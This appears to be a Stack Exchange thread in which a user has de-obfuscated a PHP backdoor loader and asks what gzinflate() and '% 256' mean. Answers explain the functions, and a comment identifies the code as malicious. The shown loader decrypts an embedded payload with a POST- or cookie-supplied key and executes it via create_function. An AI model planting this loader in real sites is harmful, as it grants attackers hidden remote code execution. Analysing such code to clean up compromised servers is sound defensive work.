Issue
I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of lack of knowledge about some things in the code below.
Code
<?php
$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted!==NULL) {
$posted= md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
for ($counter=0; $counter < 15324; $counter++) {
$idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
$posted.=$idk[$counter];
}
if($idk = @gzinflate($idk)) {
if (isset($_POST['posted']))
@setcookie('posted', $_POST['posted']);
$counter = create_function('', $idk);
unset($idk, $posted);
$counter();
}
}
The $idk variable is already a value that contains a long string that's being base64 decoded.
What I Don't Understand
I understand almost all of the code, but I don't get what % 256 does in here and also I don't know what gzinflate() does.
-
1It's a malicious backdoor. Don't spend all day investigating it; restore from backup, patch the way they got in, and move on.user149341– user1493412016年01月02日 09:06:50 +00:00Commented Jan 2, 2016 at 9:06
1 Answer 1
So, gzinflate() un-compresses input data that is compressed with the zlib DEFLATE algorithm. The corresponding function to compress or deflate an uncompressed string is called gzdeflate(), and it's manual page provides a bit more information:
This function compresses the given string using the DEFLATE data format.
For details on the DEFLATE compression algorithm see the document "DEFLATE Compressed Data Format Specification version 1.3" (RFC 1951). Sparing a few details, this is similar to compressing a file using
gzip myfile.txton the Linux command line, which would create the compressed filemyfile.txt.gz. In short, this is uncompressing compressed data assigned to$idk.
$variable % 256 returns the remainder of dividing $variable by 256. If I set $variable to 258, $variable % 256 would be 2. This is often used when you want to see if a number is cleanly-divisible by another number. If I wanted to show a status-update every 100 times of a loop, for example, I might do:
<?php
for ($i = 1; $i <= 1000; ++$i)
{
// Do something on each loop.
if (($i % 100) == 0)
{
echo sprintf("Loop %d of 1000; %d percent complete.\n", $i, $i / 1000 * 100);
}
}
But there are obviously many other uses.
As far as helping you figure out what exactly this source code does, I would recommend going through it step-by-step with real input and seeing what happens after each step. It will be hard for me to figure out much more about what it's doing without a lot more context.